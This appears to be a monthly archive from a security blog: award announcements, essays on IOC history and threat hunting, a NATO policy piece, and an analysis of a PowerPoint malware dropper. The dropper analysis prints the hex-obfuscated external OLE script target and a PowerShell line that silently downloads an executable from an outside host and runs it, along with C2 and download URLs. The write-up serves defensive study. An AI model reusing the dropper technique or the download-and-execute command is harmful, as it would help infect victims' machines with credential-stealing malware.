Monthly Archives: November 2018

Announcing the Google Security and Privacy Research Awards



We believe that cutting-edge research plays a key role in advancing the security and privacy of users across the Internet. While we do significant in-house research and engineering to protect users’ data, we maintain strong ties with academic institutions worldwide. We provide seed funding through faculty research grants and cloud credits to unlock new experiments, and we foster active collaborations, including working with visiting scholars and research interns.

To accelerate the next generation of security and privacy breakthroughs, we recently created the Google Security and Privacy Research Awards program. These awards, selected via internal Google nominations and voting, recognize academic researchers who have made recent, significant contributions to the field.

We’ve been developing this program for several years. It began as a pilot when we awarded researchers for their work in 2016, and we expanded it more broadly for work from 2017. So far, we have awarded $1 million to 12 scholars. We are preparing the shortlist of 2018 nominees and will announce the winners next year. In the meantime, we wanted to highlight the previous award winners and the influence they’ve had on the field.
2017 Awardees

Lujo Bauer, Carnegie Mellon University
Research area: Password security and attacks against facial recognition

Dan Boneh, Stanford University
Research area: Enclave security and post-quantum cryptography

Aleksandra Korolova, University of Southern California
Research area: Differential privacy

Daniela Oliveira, University of Florida
Research area: Social engineering and phishing

Franziska Roesner, University of Washington
Research area: Usable security for augmented reality and at-risk populations

Matthew Smith, Universität Bonn
Research area: Usable security for developers


2016 Awardees

Michael Bailey, University of Illinois at Urbana-Champaign
Research area: Cloud and network security

Nicolas Christin, Carnegie Mellon University
Research area: Authentication and cybercrime

Damon McCoy, New York University
Research area: DDoS services and cybercrime

Stefan Savage, University of California San Diego
Research area: Network security and cybercrime

Marc Stevens, Centrum Wiskunde & Informatica
Research area: Cryptanalysis and lattice cryptography

Giovanni Vigna, University of California Santa Barbara
Research area: Malware detection and cybercrime


Congratulations to all of our award winners.

The Origin of the Term Indicators of Compromise (IOCs)

I am an historian. I practice digital security, but I earned a bachelor of science degree in history from the United States Air Force Academy. (1)

Historians create products by analyzing artifacts, among which the most significant is the written word.

In my last post, I talked about IOCs, or indicators of compromise. Do you know the origin of the term? I thought I did, but I wanted to rely on my historian's methodology to invalidate or confirm my understanding.

I became aware of the term "indicator" as an element of indications and warning (I&W), when I attended Air Force Intelligence Officer's school in 1996-1997. I will return to this shortly, but I did not encounter the term "indicator" in a digital security context until I encountered the work of Kevin Mandia.

In August 2001, shortly after its publication, I read Incident Response: Investigating Computer Crime, by Kevin Mandia, Chris Prosise, and Matt Pepe (Osborne/McGraw-Hill). I was so impressed by this work that I managed to secure a job with their company, Foundstone, by April 2002. I joined the Foundstone incident response team, which was led by Kevin and consisted of Matt Pepe, Keith Jones, Julie Darmstadt, and me.

I Tweeted earlier today that Kevin invented the term "indicator" (in the IR context) in that 2001 edition, but a quick review of the hard copy in my library does not show its usage, at least not prominently. I believe we were using the term in the office but that it had not appeared in the 2001 book. Documentation would seem to confirm that, as Kevin was working on the second edition of the IR book (to which I contributed), and that version, published in 2003, features the term "indicator" in multiple locations.

In fact, the earliest use of the term "indicators of compromise," appearing in print in a digital security context, appears on page 280 in Incident Response & Computer Forensics, 2nd Edition.


From other uses of the term "indicators" in that IR book, you can observe that IOC wasn't a formal, independent concept at this point, in 2003. In the same excerpt above you see "indicators of attack" mentioned.

The first citation of the term "indicators" in the 2003 book shows it is meant as an investigative lead or tip:


Did I just give up my search at this point? Of course not.

If you do time-limited Google searches for "indicators of compromise," after weeding out patent filings that reference later work (from FireEye, in 2013), you might find this document, which concludes with this statement:

Indicators of compromise are from Lynn Fischer, "Looking for the Unexpected," Security Awareness Bulletin, 3-96, 1996. Richmond, VA: DoD Security Institute.

Here the context is the compromise of a person with a security clearance.

In the same spirit, the earliest reference to "indicator" in a security-specific, detection-oriented context appears in the patent Method and system for reducing the rate of infection of a communications network by a software worm (6 Dec 2002). Stuart Staniford is the lead author; he was later chief scientist at FireEye, although he left before FireEye acquired Mandiant (and me).

While Kevin, et al were publishing the second edition of their IR book in 2003, I was writing my first book, The Tao of Network Security Monitoring. I began chapter two with a discussion of indicators, inspired by my Air Force intelligence officer training in I&W and Kevin's use of the term at Foundstone.

You can find chapter two in its entirety online. In the chapter I also used the term "indicators of compromise," in the spirit Kevin used it; but again, it was not yet a formal, independent term.

My book was published in 2004, followed by two more in rapid succession.

The term "indicators" didn't really make a splash until 2009, when Mike Cloppert published a series on threat intelligence and the cyber kill chain. The most impactful in my opinion was Security Intelligence: Attacking the Cyber Kill Chain. Mike wrote:


I remember very much enjoying these posts, but the Cyber Kill Chain was the aspect that had the biggest impact on the security community. Mike does not say "IOC" in the post. Where he does say "compromise," he's using it to describe a victimized computer.

The stage is now set for seeing indicators of compromise in a modern context. Drum roll, please!

The first documented appearance of the term indicators of compromise, or IOCs, in the modern context occurs in basically two places simultaneously, with ultimate credit going to the same organization: Mandiant.

The first Mandiant M-Trends report, published on 25 Jan 2010, provides the following description of IOCs on page 9:


The next day, 26 Jan 2010, Matt Frazier published Combat the APT by Sharing Indicators of Compromise on the Mandiant blog. Matt wrote to introduce an XML-based instantiation of IOCs, which could be read and created using free Mandiant tools.


Note how complicated Matt's IOC example is. It's not a file hash (alone), or a file name (alone), or an IP address, etc. It's a Boolean expression of many elements. You can read in the text that this original IOC definition rejects what some commonly consider "IOCs" to be. Matt wrote:

Historically, compromise data has been exchanged in CSV or PDFs laden with tables of "known bad" malware information - name, size, MD5 hash values and paragraphs of imprecise descriptions... (emphasis added)
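To make Matt's point concrete, here is a minimal, hypothetical sketch in Python of an IOC as a Boolean expression of several weak elements rather than a single atom. The field names, values, and logic below are illustrative only; they are not Matt's actual example or Mandiant's schema.

def match_all(artifact, conditions):
    # AND: every condition must hold for this artifact.
    return all(cond(artifact) for cond in conditions)

def match_any(artifact, conditions):
    # OR: at least one condition must hold.
    return any(cond(artifact) for cond in conditions)

# Illustrative IOC: (file named svchost.exe AND running outside System32) OR (known-bad MD5).
def example_ioc(artifact):
    return match_any(artifact, [
        lambda a: match_all(a, [
            lambda x: x.get("file_name", "").lower() == "svchost.exe",
            lambda x: not x.get("path", "").lower().startswith("c:\\windows\\system32"),
        ]),
        lambda a: a.get("md5") == "d41d8cd98f00b204e9800998ecf8427e",  # placeholder hash
    ])

suspect = {"file_name": "svchost.exe", "path": "C:\\Users\\Public", "md5": "0" * 32}
print(example_ioc(suspect))  # True: the Boolean expression matches even though no single atom is damning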

On a related note, I looked for early citations of work on defining IOCs, and found a paper by Simson Garfinkel, a well-respected forensic analyst. He gave credit to Matt Frazier and Mandiant, writing in 2011:

Frazier (2010) of MANDIANT developed Indicators of Compromise (IOCs), an XML-based language designed to express signatures of malware such as files with a particular MD5 hash value, file length, or the existence of particular registry entries. There is a free editor for manipulating the XML. MANDIANT has a tool that can use these IOCs to scan for malware and the so-called “Advanced Persistent Threat.”

Starting in 2010, the debate was initially about the format for IOCs, and how to produce and consume them. We can see in this written evidence from 2010, however, a definition of indicators of compromise and IOCs that contains all the elements that would be recognized in current usage.

tl;dr Mandiant invented the term indicators of compromise, or IOCs, in 2010, building off the term "indicator," introduced widely in a detection context by Kevin Mandia, no later than his 2003 incident response book.

(1) Yes, a BS, not a BA -- thank you USAFA for 14 mandatory STEM classes.

Even More on Threat Hunting

In response to my post More on Threat Hunting, Rob Lee asked:

[D]o you consider detection through ID’ing/“matching” TTPs not hunting?

To answer this question, we must begin by clarifying "TTPs." Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as:

How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

In case you've forgotten David's pyramid, it looks like this.


It's important to recognize that the pyramid consists of indicators of compromise (IOCs). David uses the term "indicator" in his original post, but his follow-up post from his time at Sqrrl makes this clear:

There are a wide variety of IoCs ranging from basic file hashes to hacking Tactics, Techniques and Procedures (TTPs). Sqrrl Security Architect, David Bianco, uses a concept called the Pyramid of Pain to categorize IoCs. 

At this point it should be clear that I consider TTPs to be one form of IOC.

In The Practice of Network Security Monitoring, I included the following workflow:

You can see in the second column that I define hunting as "IOC-free analysis." On page 193 of the book I wrote:

Analysis is the process of identifying and validating normal, suspicious, and malicious activity. IOCs expedite this process. Formally, IOCs are manifestations of observable or discernible adversary actions. Informally, IOCs are ways to codify adversary activity so that technical systems can find intruders in digital evidence...

I refer to relying on IOCs to find intruders as IOC-centric analysis, or matching. Analysts match IOCs to evidence to identify suspicious or malicious activity, and then validate their findings.

Matching is not the only way to find intruders. More advanced NSM operations also pursue IOC-free analysis, or hunting. In the mid-2000s, the US Air Force popularized the term hunter-killer in the digital world. Security experts performed friendly force projection on their networks, examining data and sometimes occupying the systems themselves in order to find advanced threats. 

Today, NSM professionals like David Bianco and Aaron Wade promote network “hunting trips,” during which a senior investigator with a novel way to detect intruders guides junior analysts through data and systems looking for signs of the adversary. 

Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations. (emphasis added)

Let's consider Chris Sanders' blog post titled Threat Hunting for HTTP User Agents as an example of my definition of hunting. 

I will build a "hunting profile" via excerpts (in italics) from his post:

Assumption: "Attackers frequently use HTTP to facilitate malicious network communication."

Hypothesis: If I find an unusual user agent string in HTTP traffic, I may have discovered an attacker.

Question: “Did any system on my network communicate over HTTP using a suspicious or unknown user agent?”

Method: "This question can be answered with a simple aggregation wherein the user agent field in all HTTP traffic for a set time is analyzed. I’ve done this using Sqrrl Query Language here:

SELECT COUNT(*),user_agent FROM HTTPProxy GROUP BY user_agent ORDER BY COUNT(*) ASC LIMIT 20

This query selects the user_agent field from the HTTPProxy data source and groups and counts all unique entries for that field. The results are sorted by the count, with the least frequent occurrences at the top."

Results: Chris offers advice on how to interpret the various user agent strings produced by the query.
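For readers without Sqrrl, the aggregation in Chris's method above ("stacking" user agents by frequency) can be approximated in a few lines of Python over an exported proxy log. This is only a rough sketch under stated assumptions: the file name and the user_agent column are hypothetical, and any proxy export with a user agent field would do.

import csv
from collections import Counter

counts = Counter()
with open("httpproxy.csv", newline="") as f:  # hypothetical proxy log export
    for row in csv.DictReader(f):
        counts[row.get("user_agent", "")] += 1

# Least frequent first: rare user agents are the interesting leads for the hunt.
for user_agent, count in sorted(counts.items(), key=lambda kv: kv[1])[:20]:
    print(f"{count:6d}  {user_agent}")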

This is the critical part: Chris did not say "look for *this user agent*." He offered the reader an assumption, a hypothesis, a question, and a method. It is up to the defender to investigate the results. This, for me, is true hunting.

If Chris had instead referred users to this list of malware user agents (for example) and said look for "Mazilla/4.0", then I consider that manual (human) matching. If I created a Snort or Suricata rule to look for that user agent, then I consider that automated (machine) matching.
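To show the same distinction in code, here is an equally minimal sketch of matching against that same hypothetical log once the bad user agent is already known; a Snort or Suricata rule would simply automate the same lookup in a sensor.

import csv

KNOWN_BAD_USER_AGENTS = {"Mazilla/4.0"}  # taken from the example above

with open("httpproxy.csv", newline="") as f:  # same hypothetical proxy log export
    for row in csv.DictReader(f):
        if row.get("user_agent") in KNOWN_BAD_USER_AGENTS:
            # src_ip is an assumed column; print whatever identifies the client in your log.
            print("match:", row.get("src_ip", "?"), row.get("user_agent"))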

This is where my threat hunting definition likely diverges from modern practice. Analyst Z sees the results of Chris' hunt and thinks "Chris found user agent XXXX to be malicious, so I should go look for it." Analyst Z queries his or her data and does or does not find evidence of user agent XXXX.

I do not consider analyst Z's actions to be hunting. I consider it matching. There is nothing wrong with this. In fact, one of the purposes of hunting is to provide new inputs to the matching process, so that future hunting trips can explore new assumptions, hypotheses, questions, and methods, and let the machines do the matching on IOCs already found to be suggestive of adversary activity. This is why I wrote in my 2013 book "Upon validating the technique (and responding to any enemy actions), the hunters incorporate the new detection method into a CIRT’s IOC-centric operations."

The term "hunting" is a victim of its own success, with emotional baggage. We defenders have finally found a way to make "blue team" work appealing to the wider security community. Vendors love this new way to market their products. "If you're not hunting, are you doing anything useful?" one might ask.

Compared to "I'm threat hunting!" (insert chest beating), the alternative, "I'm matching!" (womp womp), seems sad. 

Nevertheless, we must remember that threat hunting methodologies were invented to find adversary activity for which there were no IOCs. Hunting was IOC-free analysis because we didn't know what to look for. Once you know what to look for, you are matching. Both forms of detection require analysis to validate adversary activity, of course. Let's not forget that.

I'm also very thankful, however it's defined or packaged, that people are excited to search for adversary activity in their environment, whether via matching or hunting. It's a big step from the mindset of 10 years ago, which had a "prevention works" milieu.

tl;dr Because TTPs are a form of IOC, then detection via matching IOCs is a form of matching, and not hunting.

More on Threat Hunting

Earlier this week hellor00t asked via Twitter:

Where would you place your security researchers/hunt team?

I replied:

For me, "hunt" is just a form of detection. I don't see the need to build a "hunt" team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.

This inspired Rob Lee to blog a response, from which I extract his core argument:

[Hunting] really isn’t, to me, about detecting threats...

Hunting is a hypothesis-led approach to testing your environment for threats. The purpose, to me, is not in finding threats but in determining what gaps you have in your ability to detect and respond to them...

In short, hunting, to me, is a way to assess your security (people, process, and technology) against threats while extending your automation footprint to better be prepared in the future. Or simply stated, it’s incident response without the incident that’s done with a purpose and contributes something. 

As background for my answer, I recommend my March 2017 post The Origin of Threat Hunting, which cites my article "Become a Hunter," published in the July-August 2011 issue of Information Security Magazine. I wrote it in the spring of 2011, when I was director of incident response for GE-CIRT.

For the term "hunting," I give credit to briefers from the Air Force and NSA who, in the mid-2000s briefed "hunter-killer" missions to the Red Team/Blue Team Symposium at the Johns Hopkins University Applied Physics Lab in Laurel, MD.

As a comment to that post, Tony Sager, who ran NSA VAO at the time I was briefed at ReBl, described hunting thus:

[Hunting] was an active and sustained search for Attackers...

For us, "Hunt" meant a very planned and sustained search, taking advantage of the existing infrastructure of Red/Blue Teams and COMSEC Monitoring, as well as intelligence information to guide the search. 

For the practice of hunting, as I experienced it, I give credit to our GE-CIRT incident handlers -- David Bianco,  Ken Bradley, Tim Crothers, Tyler Hudak, Bamm Visscher, and Aaron Wade -- who took junior analysts on "hunting trips," starting in 2008-2009.

It is very clear, to me, that hunting has always been associated with detecting an adversary, not "determining what gaps you have in your ability to detect and respond to them," as characterized by Rob.

For me, Rob is describing the job of an enterprise visibility architect, which I described in a 2007 post:

[W]e are stuck with numerous platforms, operating systems, applications, and data (POAD) for which we have zero visibility. 

I suggest that enterprises consider hiring or assigning a new role -- Enterprise Visibility Architect. The role of the EVA is to identify visibility deficiencies in existing and future POAD and design solutions to instrument these resources.

A primary reason to hire an enterprise visibility architect is to build visibility in, which I described in several posts, including this one from 2009 titled Build Visibility In. As a proponent of the "monitor first" school, I will always agree that it is important to identify and address visibility gaps.

So where do we go from here?

Tony Sager, as one of my wise men, offers sage advice at the conclusion of his comment:

"Hunt" emerged as part of a unifying mission model for my Group in the Information Assurance Directorate at NSA (the defensive mission) in the mid-late 2000's. But it was also a way to unify the relationship between IA and the SIGINT mission - intelligence as the driver for Hunting. The marketplace, of course, has now brought its own meaning to the term, but I just wanted to share some history. 

In my younger days I might have expressed much more energy and emotion when encountering a different viewpoint. At this point in my career, I'm more comfortable with other points of view, so long as they do not result in harm, or a waste of my taxpayer dollars, or other clearly negative consequences. I also appreciate the kind words Rob offered toward my point of view.

tl;dr I believe the definition and practice of hunting has always been tied to adversaries, and that Rob describes the work of an enterprise visibility architect when he focuses on visibility gaps rather than adversary activity.

Update 1: If in the course of conducting a hunt you identify a visibility or resistance deficiency, that is indeed beneficial. The benefit, however, is derivative. You hunt to find adversaries. Identifying gaps is secondary although welcome.

The same would be true of hunting and discovering misconfigured systems, or previously unidentified assets, or unpatched software, or any of the other myriad facts on the ground that manifest when one applies Clausewitz's directed telescope towards their computing environment.

NATO’s Cyber Operations Center – Will Russia Feel Threatened?

According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023.  The new COC reflects NATO’s understanding of the importance of cyberspace in conflict, particularly in times of political tension that have produced cyber malfeasance targeting elections and critical infrastructure.  The establishment of the COC is a natural evolution toward addressing cyber attacks in a more timely manner by integrating cyber actions with more conventional military capabilities.  In early 2014, after notable cyber attacks accompanied the international incidents in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement, Article 5 of the treaty.

In those particular instances, Russia was suspected of orchestrating, or at least tacitly supporting, the cyber attacks that afflicted both states.  Since then, Russia’s alleged cyber activities have only become more brazen in scale and aggressiveness.  From suspected involvement in cyber attacks against Ukrainian critical infrastructure to a variety of cyber operations meddling in foreign elections, Russia has taken advantage of the uncertainty of cyberspace, where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to the point of war.

NATO has always provided a strong military counterweight to Russian influence in the European region, and projecting a credible threat in cyberspace is an important complement to NATO’s capabilities.  Previously, however, NATO didn’t have any cyber weapons of its own, a significant problem given Russia’s perceived position as a near-peer adversary of the United States.  With the establishment of the COC, the United States, United Kingdom, and Estonia have offered the Alliance their cyber capabilities.  As described in one news article, the Alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the COC and under the command of NATO’s top general. With this in hand, it will be interesting to see whether the COC serves as the deterrent it’s intended to be and how Russia may adjust its cyber activities, particularly against NATO member countries.

However, the Alliance still faces a lingering problem with regard to rules of engagement.  Classifying cyber attacks under Article 5 is a start, but it doesn’t provide a path forward for how NATO can and should engage and respond to cyber attacks.  While this gives NATO a certain flexibility, allowing the Alliance to determine the extent of its response on a case-by-case basis, it does not give adversarial states a sense of which cyber activities are tolerated and which are not.  This shortcoming serves only to give states like Russia enough wiggle room to continue their offensive cyber operations as long as they don’t cross an undefined threshold.  It has long been hypothesized that attacks crippling critical infrastructure would meet that threshold, but as seen in Ukraine, that bar keeps being pushed a little farther each time.

The COC is a much-needed instrument in NATO’s overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate retaliate against, cyber attacks.  That said, as long as there are no clear lines about what will and will not be deemed acceptable in cyberspace, the status quo will remain largely in place.  Once the COC is fully operational, its first test will be how, and in what proportion, it responds to an attack against a member state.  At that point, all eyes will turn to Russia to see how it reacts and whether it alters how and where it conducts its operations.

This is a guest post by Emilio Iasiello

The post NATO’s Cyber Operations Center – Will Russia Feel Threatened? appeared first on CyberDB.

Microsoft Powerpoint as Malware Dropper

Nowadays, Microsoft Office documents are often used to propagate malware, acting as dynamic droppers. Microsoft Excel with macros or Microsoft Word with user actions (such as links or external OLE objects) are the main players in this "Office dropping arena." When I discovered that a Microsoft PowerPoint presentation had been used to drop and execute a malicious payload, I was intrigued; it's not so common (at least in my personal experience), so I decided to write a bit about it.

The "attack-path" is very close to what it's observable on modern threats since years: eMail campaign with attached document and actionable text on it. At the beginning the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct

Analysing the Microsoft PowerPoint structure, the following slide structure caught my eye:

Stage 1: Microsoft PowerPoint Dropping Website
An external OLE object (compatibility 2006) was present with the following target value:
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"  
Decoding that string from hex to ASCII makes it much more readable:

scrIPT:hxxps://a.doko.moe/wraeop.sct
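The decoding can be reproduced with a couple of lines of Python; this is just a minimal sketch using the exact target string from the slide, where urllib.parse.unquote turns each %XX sequence into its ASCII character and leaves the plain characters alone.

from urllib.parse import unquote

target = ("%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko"
          "%2Emo%65%2Fwr%61%65o%70%2E%73%63%74")
print(unquote(target))  # scrIPT:https://a.doko.moe/wraeop.sct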

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) contains JavaScript code representing Stage 2 of the infection process. It is shown as follows:

Stage 2: Executed Javascript
Decoding the 3.6KB script, it becomes clear that one more stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.
var run = new ActiveXObject('WSCRIPT.Shell').Run("powershell -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'");
The script downloads a file named DAZZI.exe and saves it under a new name, VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe, in the system temporary directory before running it. The downloaded PE executable is a .NET file created with the ExtendedScript Toolkit (according to its compilation time) on 2018-11-13 15:21:54 and submitted to VirusTotal a few hours later.

Stage 3: .NET file 
The third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload, or Stage 4. In other words, Stage 3 reads an image stored in the PE file's resources, extracts it, and executes it. The final payload appears to be AZORult malware. The evidence comes from traffic analysis, where the identified pattern POSTs browser history data and specifically crafted files from the user's AppData directory to particular PHP pages. Moreover, the command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZORult v3.
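As a hedged illustration of how an analyst might pull embedded resources out of a PE file to inspect the carrier image, here is a short sketch using the third-party pefile module. The file name is hypothetical, the resource walk is generic rather than specific to this sample, and for a .NET binary the payload may instead live in managed resources that are better viewed with tools such as dnSpy or ILSpy.

import pefile

pe = pefile.PE("stage3_sample.exe")  # hypothetical local copy of the Stage 3 binary
if hasattr(pe, "DIRECTORY_ENTRY_RESOURCE"):
    for res_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:      # resource types
        for res_id in res_type.directory.entries:             # named or numeric entries
            for res_lang in res_id.directory.entries:          # language entries hold the data
                rva = res_lang.data.struct.OffsetToData
                size = res_lang.data.struct.Size
                data = pe.get_data(rva, size)
                out = "res_{}_{}_{}.bin".format(res_type.id, res_id.id, res_lang.id)
                with open(out, "wb") as f:
                    f.write(data)
                print(out, size, "bytes")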


Stage 4: AZORult evidence


I hope you had fun with this; I did! It was very interesting to see the attackers' creativity and the way they act to include malicious content in Office documents. Microsoft should probably address this and try to filter, or at least ask permission, before including external content, but even that would not be a complete solution (in my personal opinion). A deeper and more invasive check of the remote content would be needed. Stay tuned!

IoC:
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
wraeop.sct: 4f38fcea4a04074d2729228fb6341d0c03363660f159134db35b4d259b071bb0
download1: hxxps://a.doko.moe/wraeop.sct
download2: hxxp://batteryenhancer.com
DAZZI.exe: c26de4d43100d24017d82bffd1b8c5f1f9888cb749ad59d2cd02ef505ae59f40
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da
C2: hxxps://ominigrind.ml/azzi/index.php

Get 90% Off Your First Year of RemotePC, Up To 50 Computers for $6.95

iDrive has activated a significant discount on its remote access software RemotePC in the days leading into Black Friday. RemotePC by iDrive is a full-featured remote access solution that lets you connect to your work, home, or office computer securely from anywhere, and from any iOS or Android device. Right now, their 50-computer package is 90% off, or just $6.95 for your first year. If you've been thinking about remote access solutions, now is a good time to consider RemotePC. Learn more about it here.
